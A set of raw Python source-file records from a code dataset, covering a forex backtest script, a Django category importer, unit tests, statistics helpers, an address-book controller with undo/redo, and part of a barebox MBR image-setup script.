list(self.open_positions):\n\t\t\t#print(\"open position\")\n\t\t\tpair, frame, rg, age = self.open_positions[ID]\n\t\t\tclose, low, high, op, vol, time = self.data[pair]\n\t\t\tlast_price = close[-1]\n\n\t\t\tb_price, units = self.trades[ID]\n\t\t\t#print(\"buy price:\", b_price, \" | last price: \", last_price)\n\t\t\tval1 = b_price*units\n\t\t\tval2 = last_price*units\n\t\t\tpos_val += (val2-val1)\n\n\t\tprint(\"Position value:\", pos_val)\n\t\tprint(\"Stopped trades:\", self.stopped)\n\t\tprint(\"Closed trades:\", self.mv_stopped)\n\t\tprint(\"Number of possible trades:\", self.waiting_len)\n\t\tprint(\"Min account balance:\", self.min_balance_reached)\n\t\tprint(\"Reached after\", self.low, \"trades\")\n\t\tprint(\"Negative trade count:\", len(self.losing_tades))\n\t\t#print(\"average leverage:\", self.avg_lev / self.total_trades)\n\t\tprint(\"Negative trades:\")\n\t\tfor ID in self.losing_tades:\n\t\t\ttime, pair, frame = self.losing_tades[ID]\n\t\t\tprint(pair, \"-\", frame, \" at \", time)\n\n\n\n\n# -----------------------------------------------------------------------------\n# program execution starts\n# look for buy and selling signals then sleep \n# -----------------------------------------------------------------------------\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description='backtest')\n\tparser.add_argument('--frame', required=True, dest=\"frame\", metavar='NAME', \n\t\thelp='Which chart time to test: H1; H4; D')\n\n\targs = parser.parse_args() \n\tchart_time = args.frame\n\n\tTEST = Test() # get an instance of the test class\n\n\tprint(\"/////////////////////////////////////////////////////////////////////////\")\n\tprint(\"// initializing backtesting program\")\n\tprint(\"// look back is\", TEST.lookBack, \"days\")\n\tprint(\"/////////////////////////////////////////////////////////////////////////\\n\")\n\n\tTEST.init_write()\n\n\tif chart_time == \"H1\":\n\t\t# run backtest for highest frequency chart time\n\t\tprint(\"< running backtest on H1 candles\")\n\t\tTEST.api_data(\"H1\") # update the price data \n\t\tlength = (TEST.lookBack*24 - 60) # hourly candles * 24 to get day\n\t\tfor itr in range(0, length):\n\t\t\tfind_signal(TEST, TEST, \"H1\") # pass frame as parameter\n\t\t\tTEST.manage_stops()\n\t\t\tmanage_position(TEST, TEST, logger)\n\t\t\tTEST.update_data(\"H1\")\n\n\t\tprint(\"< backtest complete, print account summary:\")\n\t\tprint(\"-------------------------------------------------------------------------\")\n\t\tTEST.account_summary()\n\n\telif chart_time == \"H4\":\n\t\t# run backtsest for medium frequency chart time\n\t\tprint(\"< running backtest on H4 candles\")\n\t\tTEST.api_data(\"H4\") # update the price data\n\t\tlength = (TEST.lookBack*6 - 60) # 4 hour candles * 6 to get day\n\t\tprint(\"< number of candles:\", length, \"\\n\")\n\t\tfor itr in range(0, length):\n\t\t\tfind_signal(TEST, TEST, \"H4\") # pass frame as parameter\n\t\t\tTEST.manage_stops()\n\t\t\tmanage_position(TEST, TEST, logger)\n\t\t\tTEST.update_data(\"H4\")\n\n\t\tprint(\"< backtest complete, print account summary:\")\n\t\tprint(\"-------------------------------------------------------------------------\")\n\t\tTEST.account_summary()\n\n\telif chart_time == \"D\":\n\t\t# run backtest for lowest frequency chart time\n\t\tprint(\"< running backtest on D candles\")\n\t\tTEST.api_data(\"D\") # update the price data\n\t\tlength = (TEST.lookBack - 60) # daily candles\n\t\tfor itr in range(0, length):\n\t\t\tfind_signal(TEST, TEST, \"D\") # pass frame as 
parameter\n\t\t\tTEST.manage_stops()\n\t\t\tmanage_position(TEST, TEST, logger)\n\t\t\tTEST.update_data(\"D\")\n\n\t\tprint(\"< backtest complete, print account summary:\")\n\t\tprint(\"-------------------------------------------------------------------------\")\n\t\tTEST.account_summary()\n\n\n\n\n\n\n\n\n","sub_path":"currency_trading/back_test.py","file_name":"back_test.py","file_ext":"py","file_size_in_byte":14431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496712188","text":"# -*- coding: utf-8 -*-\nfrom django.core.management.base import BaseCommand, CommandError\nfrom olist.models import Category, Channel\n\nclass Command(BaseCommand):\n    help = \"Imports categories\"\n\n    def add_arguments(self, parser):\n        parser.add_argument('arguments', nargs='+', type=str)\n\n\n    def handle(self, *args, **options):\n        if len(options['arguments']) == 2:\n            channel_name = options['arguments'][0]\n            filename = options['arguments'][1]\n            self.import_categories(channel_name, filename)\n    \n\n    def import_categories(self, channel_name, filename):\n        \"\"\"\n        Import categories to the database.\n\n        Args:\n            channel_name (str): The name of the channel that owns the categories.\n            filename (str): Path to the file containing the categories to be imported.\n        \"\"\"\n        \n        channel, channel_created = Channel.objects.get_or_create(name=channel_name)\n        \n        if channel_created:\n            print(\"Channel {0} created.\".format(channel_name))\n        else:\n            print(\"Channel {0} updated.\".format(channel_name))\n\n        file = open(filename, 'r').readlines()\n        \n        for row in file:\n            categories = row.strip().split('/')\n            parent = None\n\n            for category in categories:\n                category_obj, category_created = Category.objects.get_or_create(name=category.strip(), channel=channel, parent=parent)\n\n                if category_created:\n                    if parent is None:\n                        print(\"Category {0} created.\".format(category.strip()))\n                    else: \n                        print(\"Category {0}->{1} created.\".format(parent.name, category.strip()))\n                else:\n                    if parent is None:\n                        print(\"Category {0} updated.\".format(category.strip()))\n                    else: print(\"Category {0}->{1} updated.\".format(parent.name, category.strip()))\n\n                parent = category_obj\n        \n","sub_path":"work-at-olist/olist/management/commands/importcategories.py","file_name":"importcategories.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"417044525","text":"from name_function import get_formated_name\n\n\ndef main():\n    print(\"Enter 'q' at any time to quit\\n\")\n    while True:\n        first_name = input(\"Enter first name: \")\n        if first_name == \"q\":\n            break\n        last_name = input(\"Enter last name: \")\n        if last_name == \"q\":\n            break\n        print(get_formated_name(first_name, last_name))\n\n\nif __name__ == \"__main__\":\n    main()\n    ","sub_path":"python tasks/testing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"304153612","text":"from unittest import TestCase\n\nimport numpy as np\nimport pandas as pd\nimport pycr\nfrom scipy import stats\n\n\nclass test_pcr_ttest(TestCase):\n    def test_pcr_ttest(self):\n        ct1 = pd.read_csv('pycr/ct1.csv')\n        group = np.repeat(['brain', 'kidney'], 6)\n\n        d = pycr.pcr_ttest(ct1, group, 'GAPDH', 'brain')\n        self.assertIs(d.empty, False)\n        self.assertEqual(d.shape, (1, 3))\n\nclass test_pcr_wilcoxon(TestCase):\n    def test_pcr_wilcoxon(self):\n        ct1 = 
pd.read_csv('pycr/ct1.csv')\n        group = np.repeat(['brain', 'kidney'], 6)\n\n        d = pycr.pcr_wilcoxon(ct1, group, 'GAPDH', 'brain')\n        self.assertIs(d.empty, False)\n        self.assertEqual(d.shape, (1, 3))\n","sub_path":"pycr/tests/test_testing.py","file_name":"test_testing.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"423381501","text":"import numpy as np\r\nfrom misc import grouping\r\n#ungrouped mean\r\ndef no_freq_mean(X):\r\n    return np.mean(X)\r\n    \r\n# mean when frequency given\r\ndef freq_mean(X,freq): \r\n    XF = X*freq\r\n    mean = np.sum(XF)/np.sum(freq)\r\n    info = {'freq':freq,'mean':mean,\"XF\":XF}\r\n    return info\r\n\r\n#shortcut mean\r\ndef range_mean(X,freq,A =None):\r\n    if A is None: A = np.median(X)\r\n    D = X - A\r\n    FD = D * freq\r\n    mean = float(A)+float(np.sum(FD))/np.sum(freq)\r\n    info = {'A':A,'freq':freq,'D':D,'FD':FD,'mean':mean}\r\n    return info\r\n\r\n#weighted mean\r\ndef weighted_mean(X,weights):\r\n    WX = X * weights\r\n    mean = np.sum(WX)/np.sum(weights)\r\n    info = {'weights':weights,'mean':mean,\"WX\":WX}\r\n    return info\r\n\r\n#step deviation\r\ndef step_deviation(X,freq,A = None):\r\n    if A is None: A = np.median(X) \r\n    h = X[1]-X[0]\r\n    U = (X - A)/h\r\n    FU_fr = freq*U\r\n    sum_FU = np.sum(FU_fr)\r\n    sum_freq = np.sum(freq)\r\n    mean = A + h * sum_FU/sum_freq\r\n    info = {'X':X,'F':freq,'A':A,'U = (X - A)/h':U,'F*U':FU_fr,'mean':mean}\r\n    return info ","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"261498447","text":"from domain.NABException import NABException\nfrom domain.Person import Person\nfrom repository.PersonRepository import PersonRepository\nfrom repository.PersonFileRepository import PersonFileRepository\nfrom controller.ChangeHistory import *\nfrom copy import deepcopy\n\n\nclass PeopleController:\n    \"\"\"\n    Class used for handling the operations regarding people.\n    \"\"\"\n\n    def __init__(self, personRepo):\n        '''\n        Constructor for the class PeopleController.\n        :param personRepo: PersonRepository - repository containing people\n        :exception NABException: if one of the parameters is not valid\n        '''\n\n        if not isinstance(personRepo, PersonRepository):\n            raise NABException(\"The given repository of people is not valid.\")\n\n        self.__personRepo = personRepo\n        self.__operations = []\n        self.__index = -1\n\n\n    def number_of_people(self):\n        '''\n        Returns the number of people in the list.\n        :return: natural number representing the number of people in the list\n        '''\n\n        return len(self.__personRepo)\n\n\n    def add_person(self, person):\n        '''\n        Adds a person to the NAB.\n        :param person: Person - person to be added to the NAB\n        :return: person is added to the NAB\n        :exception NABException: if one of the parameters is not valid or a person with that id already exists\n        '''\n\n        self.__personRepo.add(person)\n\n        self.__operations[:] = self.__operations[:self.__index+1]\n        self.__operations.append(AddOperation(deepcopy(person)))\n        self.__index += 1\n\n\n    def remove_person_by_id(self, id):\n        '''\n        Removes the person with the indicated ID from the list and their afferent activities.\n        :param id: positive integer - ID of a person\n        :return: the person with the indicated ID is removed as well as their afferent activities\n        :exception NABException: if one of the parameters is not valid or no person with the given ID was found\n        '''\n\n        person = 
self.__personRepo.remove_by_id(id)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(RemoveOperation(deepcopy(person)))\n self.__index += 1\n\n\n def update_person_name(self, person, name):\n '''\n Updates name of a person.\n :param person: Person to be updated\n :param name: new name for that person\n :return: person is updated\n :exception NABException: if one of the parameters is not valid or no person was found\n '''\n\n if person not in self.__personRepo:\n raise NABException(\"There's no such person in the list.\")\n\n oldPerson = deepcopy(person)\n person.name = name\n newPerson = deepcopy(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(UpdateOperation(oldPerson, newPerson))\n self.__index += 1\n\n\n def update_person_phone(self, person, phone):\n '''\n Updates phone of a person.\n :param person: Person to be updated\n :param phone: new phone for that person\n :return: person is updated\n :exception NABException: if one of the parameters is not valid or no person was found\n '''\n\n if person not in self.__personRepo:\n raise NABException(\"There's no such person in the list.\")\n\n oldPerson = deepcopy(person)\n person.phone = phone\n newPerson = deepcopy(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(UpdateOperation(oldPerson, newPerson))\n self.__index += 1\n\n\n def update_person_address(self, person, address):\n '''\n Updates address of a person.\n :param person: Person to be updated\n :param address: new address for that person\n :return: person is updated\n :exception NABException: if one of the parameters is not valid or no person was found\n '''\n\n if person not in self.__personRepo:\n raise NABException(\"There's no such person in the list.\")\n\n oldPerson = deepcopy(person)\n person.address = address\n newPerson = deepcopy(person)\n\n self.__operations[:] = self.__operations[:self.__index+1]\n self.__operations.append(UpdateOperation(oldPerson, newPerson))\n self.__index += 1\n\n\n def undo(self):\n '''\n Undoes the last operation that modified the repositories.\n :return: repositories are modified accordingly\n :exception NABException: if no undo is possible\n '''\n\n if self.__index == -1:\n raise NABException(\"# There's nothing to undo.\\n\")\n\n lastOperation = self.__operations[self.__index]\n\n if type(lastOperation) == AddOperation:\n self.__personRepo.remove_by_id(lastOperation.object().id)\n elif type(lastOperation) == RemoveOperation:\n self.__personRepo.add(lastOperation.object())\n elif type(lastOperation) == UpdateOperation:\n person = self.__personRepo.find_by_id(lastOperation.new().id)\n person.name = lastOperation.old().name\n person.address = lastOperation.old().address\n person.phone = lastOperation.old().phone\n else:\n raise NABException(\"# Not an undoable operation.\\n\")\n\n self.__index -= 1\n\n\n def redo(self):\n '''\n Redoes the last undo.\n :return: repositories are modified accordingly\n :exception NABException: if no redo is possible\n '''\n\n if self.__index+1 == len(self.__operations):\n raise NABException(\"# There's nothing to redo.\\n\")\n\n self.__index += 1\n lastOperation = self.__operations[self.__index]\n\n if type(lastOperation) == AddOperation:\n self.__personRepo.add(lastOperation.object())\n elif type(lastOperation) == RemoveOperation:\n self.__personRepo.remove_by_id(lastOperation.object().id)\n elif type(lastOperation) == UpdateOperation:\n person = 
self.__personRepo.find_by_id(lastOperation.old().id)\n person.name = lastOperation.new().name\n person.address = lastOperation.new().address\n person.phone = lastOperation.new().phone\n else:\n raise NABException(\"# Not a redoable operation.\\n\")\n\n\n def find_person_by_id(self, id):\n '''\n Returns the person from the current list with the indicated ID.\n :param id: positive integer - ID of a person\n :return: Person - the person with the ID id\n :exception NABException: if one of the parameters is not valid or no person with the given ID was found\n '''\n\n return self.__personRepo.find_by_id(id)\n\n\n def find_people_by_name(self, name):\n '''\n Returns a PersonRepository which contains only people with the indicated substring as part of their name.\n :param name: string - name to find people\n :return: PersonRepository - people with the indicated substring as part of their name\n :exception NABException: if one of the parameters is not valid\n '''\n\n return self.__personRepo.find_by_name(name)\n\n\n def find_people_by_address(self, address):\n '''\n Returns a PersonRepository which contains only people with the indicated substring as part of their address.\n :param address: string - address to find people\n :return: PersonRepository - people with the indicated substring as part of their address\n :exception NABException: if one of the parameters is not valid\n '''\n\n return self.__personRepo.find_by_address(address)\n\n\n def find_people_by_phone(self, phone):\n '''\n Returns a PersonRepository which contains only people with the indicated substring as part of their phone number.\n :param phone: string - phone number to find people\n :return: PersonRepository - people with the indicated substring as part of their phone number\n :exception NABException: if one of the parameters is not valid\n '''\n\n return self.__personRepo.find_by_phone(phone)\n\n\n def people_to_string(self):\n '''\n Returns a string representing the list of people in their short representation.\n :return: string - list of people or \"None\" if the list is empty\n '''\n\n return str(self.__personRepo)","sub_path":"sem1/fp/labs/lab12-13/NABManagement/controller/PeopleController.py","file_name":"PeopleController.py","file_ext":"py","file_size_in_byte":8425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"550284848","text":"\"\"\"\ninfo:\n file : core.py\n author : Thanasis Mattas\n license : GNU General Public License v3\n description : Usually, does some spiralsorting stuff\n\nSpiralSort is free software; you may redistribute it and/or modify it\nunder the terms of the GNU General Public License as published by the\nFree Software Foundation, either version 3 of the License, or (at your\noption) any later version. You should have received a copy of the GNU\nGeneral Public License along with this program. 
If not, see\n.\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\n\nfrom spiralsort import utilities as util\n\n\ndef master_offset(nodes, master_node_id):\n \"\"\"offsets all nodes, so that master_node becomes the origin\"\"\"\n master_index = nodes.loc[nodes.node_id == master_node_id].index[0]\n nodes.x = nodes.x - nodes.loc[master_index, \"x\"]\n nodes.y = nodes.y - nodes.loc[master_index, \"y\"]\n nodes.z = nodes.z - nodes.loc[master_index, \"z\"]\n return nodes\n\n\ndef distances_from_node(nodes, node):\n \"\"\"evaluates the distances (norm I2) of nodes from node\n\n Args:\n nodes (df) : has node_id, x, y, z columns\n node (df)\n\n Returns:\n distances (array)\n \"\"\"\n distances = np.sqrt(\n (nodes.x - node.x) ** 2\n + (nodes.y - node.y) ** 2\n + (nodes.z - node.z) ** 2\n )\n return distances\n\n\ndef prev_node_gradient(prev_node):\n \"\"\"returns the angle of the prev_node vector from the 0x axis\n\n this is the angle that the point cloud will be rotated, in order to\n filter the counterclockwise side of the prev_node vector\n\n Args:\n prev_node (df) : columns: [\"node_id\", 'x', 'y', 'z', ...]\n\n Returns:\n theta (float) : the gradient of the prev_node in radians\n \"\"\"\n if ((prev_node.x < 0.001) and (prev_node.x > -0.001)\n and (prev_node.y >= 0)):\n theta = np.pi / 2\n elif ((prev_node.x < 0.001) and (prev_node.x > -0.001)\n and (prev_node.y < 0)):\n theta = - np.pi / 2\n elif prev_node.x >= 0.001:\n theta = np.arctan(prev_node.y / prev_node.x)\n # elif prev_node.iloc[0].x <= -0.001:\n else:\n theta = np.arctan(prev_node.y / prev_node.x) + np.pi\n return theta\n\n\ndef z_rotation(nodes, prev_node):\n \"\"\"2D rotation on z axis (linear transformation), such as prev_node\n will fall on the 0x axis\n\n transformation matrix:\n\n | cos(theta) sin(theta)|\n |-sin(theta) cos(theta)|\n\n theta > 0 : clockwise\n theta < 0 : counterclockwise\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the node that will fall on the 0x axis\n\n Returns:\n rotated (df) : the point cloud after the rotation\n \"\"\"\n theta = prev_node_gradient(prev_node)\n rotated = nodes.copy()\n rotated.x = np.cos(theta) * nodes.x + np.sin(theta) * nodes.y\n rotated.y = - np.sin(theta) * nodes.x + np.cos(theta) * nodes.y\n return rotated\n\n\ndef counterclockwise_filter(nodes, prev_node):\n \"\"\"The goal is to force the algorithm to rotate anti-clockwise.\n Rotating the nodes, so that the vector of prev_node becomes the 0x\n axis, we keep only nodes with positive y, to find the next node from.\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the last popped node\n\n Returns:\n (index) : the indexes of the filtered nodes\n \"\"\"\n nodes_rotated = z_rotation(nodes, prev_node)\n nodes_filtered_index = nodes_rotated[nodes_rotated.y > 0].index\n\n # don't counterclockwise filter if prev_node is the master_node\n # or no nodes are left after the filter\n if len(nodes_filtered_index):\n return nodes_filtered_index\n else:\n return nodes.index\n\n\ndef cost(nodes, prev_node):\n \"\"\"|node - master| + |node - prev_node|\n\n Args:\n nodes (df) : the point cloud\n prev_node (df) : the node from which to calculate the cost\n\n Returns:\n cost_ (series) : the cost column, to be inserted to the df\n \"\"\"\n cost_ = nodes[\"|node - master|\"].add(\n distances_from_node(nodes, prev_node)\n )\n return cost_\n\n\ndef cost_sort(nodes, prev_node, ignore_index=True):\n \"\"\"sorts the nodes by cost from prev_node\n\n cost = |node - master| + |node - prev_node|\n\n Args:\n nodes (df) : the point cloud\n 
prev_node (df) : the node from which to calculate the cost\n        ignore_index (bool) : whether to keep or reset the old index\n            (default True)\n\n    Returns:\n        nodes (df) : the point cloud, cost-sorted\n    \"\"\"\n    with pd.option_context(\"mode.chained_assignment\", None):\n        nodes.loc[:, \"cost\"] = cost(nodes, prev_node)\n    nodes.sort_values(\"cost\", inplace=True, kind=\"mergesort\",\n                      na_position=\"first\", ignore_index=ignore_index)\n    return nodes\n\n\ndef pop_next_node(nodes, prev_node):\n    \"\"\"\n    1. evaluate cost\n    2. pop the next_node (the one with the min cost)\n\n    Args:\n        nodes (df)     : the point cloud\n        prev_node (df) : the last popped node\n\n    Returns:\n        nodes (df)        : the point cloud, without the currently\n                            popped node\n        next_node_id (str)\n        next_node (series)\n    \"\"\"\n    nodes_filtered = nodes.loc[counterclockwise_filter(nodes, prev_node)]\n\n    # 1. evaluate cost\n    nodes_filtered.loc[:, \"cost\"] = cost(nodes_filtered, prev_node)\n\n    # 2. pop the next_node\n    next_node_idx = nodes_filtered[\"cost\"].idxmin()\n    next_node = nodes_filtered.loc[next_node_idx]\n    next_node_id = next_node.node_id\n    nodes = nodes[~nodes.index.isin([next_node.name])]\n    return nodes, next_node_id, next_node\n\n\ndef spiral_stride(nodes,\n                  node_ids,\n                  prev_node,\n                  spiral_window,\n                  stride):\n    \"\"\"moves one stride inside the spiral_window, iteratively popping\n    nodes with respect to the min cost\n\n    Args:\n        nodes (df)          : the nodes batch that the algorithm is\n                              working on\n        node_ids (list)     : the so far spiral-sorted list of node_ids\n        prev_node (df)      : the last sorted (popped) node\n        spiral_window (int) : the window of nodes that the algorithm\n                              will iteratively search for the next node\n        stride (int)        : the number of nodes to be sorted, before\n                              moving to the next spiral_window\n\n    Returns:\n        nodes (df)      : the initial nodes batch, without the\n                          nodes popped at this stride\n        node_ids (list) : the so far spiral-sorted list of node_ids\n                          updated with the nodes popped at this\n                          stride\n        prev_node (df)  : the last popped node at this stride\n    \"\"\"\n    # keep a temp node_ids list, so we don't search through the whole list\n    node_ids_inner = []\n\n    # for the first 1000 nodes don't filter the counterclockwise side\n    # nodes, to prevent from oscillating on a lobe (half spherical disk)\n    if len(node_ids) <= 1000:\n        nodes_filtered = nodes[slice(0, spiral_window)]\n    else:\n        nodes_filtered = nodes.loc[counterclockwise_filter(nodes, prev_node)]\n        # cost-sort only the counterclockwise-filtered nodes\n        nodes_filtered = cost_sort(nodes_filtered, prev_node)\n    nodes_filtered = nodes_filtered[slice(0, spiral_window)]\n\n    iters = min(stride, len(nodes_filtered.index))\n\n    for _ in range(iters):\n        nodes_filtered, prev_node_id, prev_node = pop_next_node(\n            nodes_filtered,\n            prev_node\n        )\n        node_ids_inner.append(prev_node_id)\n\n    # drop node_ids_inner from nodes remainder\n    nodes = nodes[~nodes.node_id.isin(node_ids_inner)]\n\n    # update node_ids\n    node_ids += node_ids_inner\n\n    return nodes, node_ids, prev_node\n\n\ndef check_duplicated_ids(nodes):\n    \"\"\"check node_ids uniqueness\"\"\"\n    duplicated_ids = nodes[nodes.node_id.duplicated()].node_id.to_list()\n    if duplicated_ids:\n        raise Exception(\"node_id column has duplicated entries: {}\"\n                        .format(duplicated_ids))\n\n\ndef spiralsort(nodes, master_node_id):\n    \"\"\"spiral-sorting the node-cloud, starting from the master node\n\n    Spiral-sorting algorithm:\n    1. Sort the point cloud with respect to the distance from the master\n       node and segment it into slices.\n    2. Take the first slice (2000 nodes)\n    3. 
Take a SPIRAL_WINDOW (slice further)\n       Spiral windows for the 1st slice consist of 300 nodes, starting\n       from the last sorted node (the master_node for the 1st window)\n    4. Iteratively pop 20 nodes (a stride), by the minimum cost.\n       (cost = |node - master_node| + |node - prev_node|)\n       Take the next SPIRAL_WINDOW and pop the next 10 nodes.\n       Continue until the remainder of the nodes reaches the size of the\n       half slice (1000 nodes for the 1st slice).\n    5. Merge the remaining nodes with the next slice\n       (This overlap of the slices ensures that there is continuity\n       while selecting the next nodes when the algorithm reaches the\n       last nodes of the slice)\n    6. For the next slices, a filter is applied, which keeps only nodes\n       from the counterclockwise side of the vector starting from the\n       master node and ending at the previous node, in order to force the\n       algorithm to move to a constant rotation direction\n    7. Keep moving by SPIRAL_WINDOWs (or strides), counterclockwise\n       filtering at each stride, popping 10s of nodes until the half\n       slice threshold\n    8. Upon reaching the last slice, remove the half_slice threshold, to\n       pop all the remaining nodes.\n\n    Args:\n        nodes (df)           : the box_nodes (without the bar_nodes)\n        master_node_id (str) : the node on the box surface where the\n                               deformation starts\n\n    Returns:\n        nodes_sorted (df) : the nodes spiral-sorted, starting from\n                            the master node\n    \"\"\"\n    # first, check if the node_ids are unique\n    check_duplicated_ids(nodes)\n\n    # final sequence of ids, used to sort the final dataframe,\n    # initialized with the master node\n    node_ids = [master_node_id]\n\n    # make master_node the origin of the axes\n    nodes = master_offset(nodes, master_node_id)\n\n    # initialize previous node with the master node (series)\n    master_node = nodes.loc[nodes[\"node_id\"] == master_node_id]\n    prev_node = master_node.iloc[0]\n\n    # drop master node\n    nodes.drop(master_node.index, inplace=True)\n\n    # distance of all nodes from the master node\n    nodes[\"|node - master|\"] = distances_from_node(nodes, prev_node)\n\n    # distance-sort from master_node\n    nodes.sort_values(\"|node - master|\", inplace=True, kind=\"mergesort\",\n                      ignore_index=True)\n\n    # segment nodes into slices, not to work on the whole df\n    # [\n    #     [0, 2000], [2000, 6000], [6000, 14000], [14000, 30000],\n    #     [30000, 62000], [62000, 94000], [94000, 126000], ...\n    # ]\n    slices = util.create_slices(nodes)\n\n    # number of nodes anti-clockwise filtered and cost_sorted from prev\n    # node, in order to iteratively pop the next nodes in the STRIDE\n    SPIRAL_WINDOW = 400\n    STRIDE = 15\n\n    # this is the container that the sorting algorithm will work with\n    remaining_nodes = pd.DataFrame(columns=nodes.columns)\n\n    for idx, slicing_obj in enumerate(slices):\n\n        # moving to more distant slices, spiral_window gets bigger, as\n        # the nodes are more spread out away from the master node\n        spiral_window = int(SPIRAL_WINDOW + 100 * idx)\n\n        # Concat with the remainder of the nodes (which is the half of\n        # the previous slice), in order to have continuity.\n        # (For example, previous to last node will only have the last\n        # remaining node to find the next cost-sorted node, which is\n        # not correct, because there are other candidates, not included\n        # in the current slice.)\n        remaining_nodes = pd.concat([remaining_nodes, nodes[slicing_obj]])\n\n        half_slice = util.calc_half_slice(slicing_obj)\n\n        # leave half_slice remaining nodes to merge with the next slice\n        # except from the last slice\n        if (slicing_obj in slices[: -1]) and (len(slices) 
> 1):\n spiral_iters = (len(remaining_nodes.index) - half_slice) // STRIDE\n else:\n spiral_iters = len(remaining_nodes.index) // STRIDE\n\n for _ in range(spiral_iters):\n remaining_nodes, node_ids, prev_node = spiral_stride(\n remaining_nodes,\n node_ids,\n prev_node,\n spiral_window,\n STRIDE\n )\n\n # return master node to nodes\n nodes = pd.concat([master_node, nodes])\n # reorder nodes with respect to the spiral-sorted node_ids\n node_ids = pd.DataFrame({\"node_id\": node_ids})\n nodes_sorted = node_ids.merge(nodes, on=\"node_id\") \\\n .loc[:, [\"node_id\", 'x', 'y', 'z']] \\\n .reset_index(drop=True, inplace=False)\n\n return nodes_sorted\n","sub_path":"spiralsort/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":13216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"45071101","text":"# Copyright (C) 2009 Juergen Beisert, Pengutronix\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of\n# the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\n\n#\n# @file\n# @brief Write the barebox binary to the MBR and the following disk sectors\n#\n# Also patch dedicated locations in the image to make it work at runtime\n#\n# Current restrictions are:\n# - only installs into MBR and the sectors after it\n# - tested only with QEMU\n# - and maybe some others\n#\n\nimport os.path\n\nscript_path = os.path.dirname(__file__)\n\ndef values2string(values):\n import sys\n if sys.version_info[0]==2:\n return \"\".join(map(chr, values))\n else:\n return bytes(values)\n\ndef populate_globals_from_header(header_file):\n f = open(header_file, \"r\")\n for line in f.readlines():\n line = line.strip()\n if line.startswith(\"#define\"):\n (variable, value) = line[len(\"#define\"):].strip().split(\" \")\n globals()[variable] = eval(value)\n\npopulate_globals_from_header(os.path.join(script_path, \"barebox.lds.h\"))\n\nclass Field(object):\n def __init__(self, start, size):\n self.start = start\n self.size = size\n\n def __get__(self, instance, owner):\n start = instance.start_offset + self.start\n values = instance.array[start:start+self.size]\n powers = range(len(values))\n powers = map(lambda x: 256**x, powers)\n summands = map(int.__mul__, values, powers)\n return sum(summands)\n\n def __set__(self, instance, value):\n if value >= 2**(self.size*8):\n raise ValueError(\"%u does not fit in this field\" % value)\n powers = []\n while value!=0:\n powers.append( int(value % 256) )\n value /= 256\n powers.extend( self.size*[0] )\n start = instance.start_offset + self.start\n\n instance.array[start:start+self.size] = values2string(powers[0:self.size])\n\nclass ClassWithLength(type):\n def __len__(self):\n return self.clslength()\n\nclass StructTemplate(object, metaclass=ClassWithLength):\n #__metaclass__ = ClassWithLength\n\n @classmethod\n def clslength(cls):\n len = 0\n for attr in cls.__dict__.values():\n if isinstance(attr, Field):\n len += 
attr.size\n return len\n\n def __len__(self):\n return len(self.__class__)\n\nclass DAPS(StructTemplate):\n def __init__(self, array, start_offset):\n self.array = array\n self.start_offset = start_offset\n\n size = Field(0, 1)\n res1 = Field(1, 1)\n count = Field(2, 1)\n res2 = Field(3, 1)\n offset = Field(4, 2)\n segment = Field(6, 2)\n lba = Field(8, 8)\n\nclass Partition(StructTemplate):\n def __init__(self, array, start_offset):\n self.array = array\n self.start_offset = start_offset\n\n boot_indicator = Field(0, 1)\n chs_begin = Field(1, 3)\n type = Field(4, 1)\n chs_end = Field(5, 3)\n partition_start = Field(8, 4)\n partition_size = Field(12, 4)\n\ndef target2host_32(value):\n return value\n\ndef host2target_16(value):\n return value\n\ndef host2target_64(value):\n return value\n\nclass SetupMbrError:\n pass\n\ndef fill_daps(sector, count, offset, segment, lba):\n assert count < 128\n assert offset < 0x10000\n assert segment < 0x10000\n\n sector.size = len(sector)\n sector.res1 = 0\n sector.count = count\n sector.res2 = 0\n sector.offset = host2target_16(offset)\n sector.segment = host2target_16(segment)\n sector.lba = host2target_64(lba)\n\n return True\n\ndef invalidate_daps(sector):\n sector.size = MARK_DAPS_INVALID\n sector.res1 = 0\n\ndef barebox_linear_image(hd_image, daps_table, size):\n offset = LOAD_AREA\n segment = LOAD_SEGMENT\n i = 0\n lba = 2\n\n size -= 2 * SECTOR_SIZE\n size = (size + SECTOR_SIZE - 1) & ~(SECTOR_SIZE - 1)\n\n if (size >= (SECTOR_SIZE / len(DAPS) - 1) * 32 * 1024):\n print(\"Image too large to boot. Max size is %u kiB, image size is %u kiB\" %\n ((SECTOR_SIZE / len(DAPS) - 1) * 32, size / 1024)\n )\n return False\n\n if size > 32 * 1024:\n next_offset = (offset + 32 * 1024 -1) & ~0x7fff\n chunk_size = next_offset - offset\n if chunk_size & (SECTOR_SIZE-1):\n print(\"Unable to pad from %X to %X in multiple of sectors\" % (offset, next_offset))\n 